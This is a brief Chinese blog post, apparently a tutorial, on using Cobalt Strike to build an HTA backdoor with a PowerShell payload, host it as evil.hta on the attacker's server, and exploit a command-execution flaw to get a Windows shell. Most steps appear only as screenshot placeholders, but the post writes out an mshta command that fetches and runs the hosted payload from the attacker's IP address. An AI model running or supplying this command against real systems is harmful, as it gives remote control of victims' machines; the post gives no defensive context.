设置监听
在这里插入图片描述
生成http application后门 选择powershell脚本
在这里插入图片描述
在这里插入图片描述
然后把生成的evil.hta文件上传到cs服务器上
在这里插入图片描述
在这里插入图片描述

这时已经挂在cs服务器/download目录下

如果有命令执行漏洞,执行mshta+刚才生成的路径

mshta http://192.168.17.181:80/download/file.ext

在这里插入图片描述
然后就获得一个shell,只适用win
在这里插入图片描述

posted on   noone52  阅读(34)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通



点击右上角即可分享
微信分享提示